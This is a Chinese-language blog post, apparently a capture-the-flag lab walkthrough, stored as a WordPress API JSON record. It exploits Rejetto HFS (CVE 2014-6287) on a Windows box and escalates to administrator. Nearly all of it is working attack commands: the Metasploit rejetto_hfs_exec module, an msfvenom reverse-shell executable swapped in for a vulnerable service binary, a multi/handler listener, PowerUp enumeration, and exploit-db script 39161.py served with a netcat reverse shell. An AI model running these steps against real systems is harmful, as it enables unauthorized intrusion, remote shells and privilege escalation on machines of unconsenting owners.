CVE 2014-6287
\nOS:WINDOWS
\nmsfconsole\u542f\u52a8\u63a7\u5236\u53f0
\nuse exploit\/windows\/http\/rejetto_hfs_exec
\nset rhost\u76ee\u6807\u5730\u5740
\nset rport \u76ee\u6807\u7aef\u53e38080
\nrun
\n\u62ff\u5230meterpreter
\ndir
\ncd \"c:\/Users\/bill\/Desktop\"
\ncat user.txt \u62ff\u5230\u7b2c\u4e00\u4e2a\u7b54\u6848
\n\u5f00\u542f\u7b2c\u4e8c\u4e2akali shell\u4e0b\u8f7d\u63d0\u6743\u811a\u672c
\n\u4e0b\u8f7d \u63d0\u6743 \u811a\u672c
\ngit clone https:\/\/github.com\/PowerShellMafia\/PowerSploit.git
\ncd PowerSploit
\ncd Privesc
\ncp PowerUp.ps1 \/root\/
\ncd \/root
\nls
\n\u8fd4\u56de\u7b2c\u4e00\u4e2amsf\u63a7\u5236\u53f0
\ncd \"c:\/Program Files (x86)\\IObit\"
\nmeterpreter> upload \/root\/PowerUp.ps1
\ndir
\nload powershell
\nmeterpreter>powershell_shell
\nps> . .\\PowerUp.ps1
\nps> Invoke-Allchecks
\n\u53d1\u73b0AdvancedSystemCareService9
\nC:\\Program Files (x86)\\IObit\\Advanced SystemCare\\ASCService.exe
\n\u53d1\u73b0 ASCSservice.exe\u8fdb\u7a0b\u6709\u6743\u9650<\/p>\n
\u65b0\u5efamsf \u4f1a\u8bdd
\nuse exploit\/multi\/handler
\nset payload windows\/shell\/reverse_tcp (\u8fd9\u6b65\u5f88\u91cd\u8981\u7ecf\u5e38\u5fd8\u8bb0)
\nshow options
\nset lhost 10.10.94.115 \u6211\u7684\u63a7\u5236\u7aef\u4e3b\u673a\u5730\u5740
\nset lport 4443
\nrun -j \u6216exploit -j
\n\u542f\u52a8\u76d1\u542c<\/p>\n
\u65b0\u5efamsf
\n\u7136\u540e\u751f\u6210 \u540e\u95e8\u6728\u9a6c s
\nmsfvenom -p windows\/shell_reverse_tcp LHOST=10.10.94.115 LPORT=4443 -e x86\/shikata_ga_nai -f exe -o ASCService.exe
\nls\u67e5\u770b\u751f\u6210\u5426
\n\u8fd4\u56demeterpreter\u547d\u4ee4 ctrl+z \u8f93\u5165 yes\u786e\u8ba4\u8fd4\u56desessions -l
\n\u4e0a\u4f20\u6728\u9a6c
\nmeterpreter\u4e0b\u8f6c\u6362\u63d2\u5165\u6728\u9a6c\u7684\u7a0b\u5e8f\u76ee\u5f55\u6267\u884ccd \"c:\/Program Files (x86)\\IObit\"
\nmeterpreter> upload ASCService.exe
\ndir
\n\u786e\u8ba4ASCService.exe\u6587\u4ef6\u4e0a\u4f20\u5230c:\/Program Files (x86)\\IObit\u4e0b<\/p>\n
\u63a5\u4e0b\u6765 \u8f93\u5165shell\u8f6c\u6362meterpreter\u4e3ashell
\nsc stop AdvancedSystemCareService9
\nCOPY ASCService.exe \"Advanced SystemCare\" \u8f93\u5165Yes\u786e\u8ba4 \u8f93\u5165\u4e00\u81f4
\nsc start AdvancedSystemCareService9
\n\u53e6\u4e2a\u76d1\u63a7\u7684\u5730\u65b9sessions -l \u67e5\u770b\u4f1a\u8bddsessions -i 2
\nwhoami
\ncd C:\\Users\\Administrator\\Desktop
\ndir
\ntype C:\\Users\\Administrator\\Desktop\\root.txt
\n\u4e0b\u4e00\u6b65\u4e0d\u4f7f\u7528metasploit\u8fdb\u884c\u8bbf\u95ee\u548c\u63d0\u6743
\n\u6211\u4eec\u5c06\u5229\u7528powershell\u548cwinpeas\u8fdb\u884c\u679a\u4e3e\u6536\u96c6\u4fe1\u606f
\n*\u8bf7\u6ce8\u610f\uff0c\u60a8\u9700\u8981\u540c\u65f6\u6fc0\u6d3b\u4e00\u4e2aWeb\u670d\u52a1\u5668\u548c\u4e00\u4e2anetcat\u4fa6\u542c\u5668\uff0c\u4ee5\u4f7f\u5176\u6b63\u5e38\u5de5\u4f5c\uff01*
\nwget https:\/\/github.com\/andrew-d\/static-binaries\/blob\/master\/binaries\/windows\/x86\/ncat.exe<\/p>\n
exit
\nsessions -K \u5173\u95ed\u6240\u6709\u4f1a\u8bdd
\nexit
\nsearchsploit rejetto http file server
\n\u7f3a\u5c11\u6700\u65b0\u7684exploit \u6240\u4ee5\u6211\u4eec\u4e0b\u8f7d
\ncp \/usr\/share\/exploitdb\/exploits\/windows\/remote\/39161.py elliot.py
\nls
\nnano elliot.py
\n\u4fee\u6539\u6211\u7684 ip \u548cport 9001 \u4fdd\u5b58
\n\u4e0b\u8f7dnetcat.exe
\nwget https:\/\/github.com\/andrew-d\/static-binaries\/blob\/master\/binaries\/windows\/x86\/ncat.exe
\nmv ncat.exe nc.exe
\npython -m SimpleHTTPServer 80
\nnc -lvnp 9001
\npython elliot.py 10.10.226.87 8080 \u76ee\u6807ip<\/p>\n
\u901a\u8fc7powershell\u83b7\u5f97\u670d\u52a1\u547d\u4ee4<\/p>\n
powershell -c \"Get-Service\"<\/p>\n","protected":false},"excerpt":{"rendered":"
CVE 2014-6287 OS:WINDOWS msfconsole\u542f\u52a8\u63a7\u5236\u53f0 use exploit\/wi […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-499","post","type-post","status-publish","format-standard","hentry","category-net-security"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/499","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=499"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/499\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=499"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=499"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=499"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}